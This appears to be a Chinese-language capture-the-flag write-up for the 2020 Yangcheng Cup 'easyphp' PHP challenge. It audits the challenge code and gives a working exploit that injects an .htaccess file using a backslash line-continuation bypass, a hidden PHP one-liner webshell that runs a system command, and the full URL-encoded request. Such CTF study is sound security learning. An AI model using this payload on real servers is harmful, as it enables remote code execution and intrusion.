[羊城杯2020]easyphp

<?php 
    $files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
    if(!isset($_GET['content']) || !isset($_GET['filename'])) { 
        highlight_file(__FILE__); 
        die(); 
    } 
    $content = $_GET['content']; 
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { 
        echo "Hacker"; 
        die(); 
    } 
    $filename = $_GET['filename']; 
    if(preg_match("/[^a-z\.]/", $filename) == 1) { 
        echo "Hacker"; 
        die(); 
    } 
    $files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
    file_put_contents($filename, $content . "\nHello, world"); 
?>

代码审计

$files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
如果不是index.php页面，则会删除页面数据

if(!isset($_GET['content']) || !isset($_GET['filename'])) { 
        highlight_file(__FILE__); 
        die(); 
    } 如果没有传入content或filename参数则直接die

$content = $_GET['content']; 
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { 
        echo "Hacker"; 
        die(); 
    } 

对传入参数content进行过滤，不能由on html type flag upload file

$filename = $_GET['filename']; 
    if(preg_match("/[^a-z\.]/", $filename) == 1) { 
        echo "Hacker"; 
        die(); 
    } 

对传入参数filename进行过滤，filename只能由小写字母和.构成，否则die

$files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
跟最开始的过滤一样，如果不是index.php则会删除数据

 file_put_contents($filename, $content . "\nHello, world"); 

将我们传入的内容content写入filename里面
但注意这里拼接了一个Hello world，会造成我们程序报错

最初的想法就是filename为a.php,content传入一句话木马，结果实践：

发现当作html直接输出在页面，并没有解析，或许后台设置了只解析了index.php,毕竟代码对index.php的提醒挺多的，于是在想能不能在index.php之前解析我们的htaccess，将配置项改一下即可，于是学习大佬得知还真是要利用htaccess来进行获取flag 

php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /fla?');?>\

 htaccess中\的作用是拼接上下文的，相当于php_value auto_prepend_file.htaccess

因为为了绕过过滤因此从file中间分开

 其中利用注释符#将一句话木马写入，是因为在htaccess中是注释符的作用，但是在php执行的时候，一句话木马就会被执行

第三行的\是为了和代码最后面拼接的Hello，world也当作注释，否则hello world到第四行会执行报错

?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C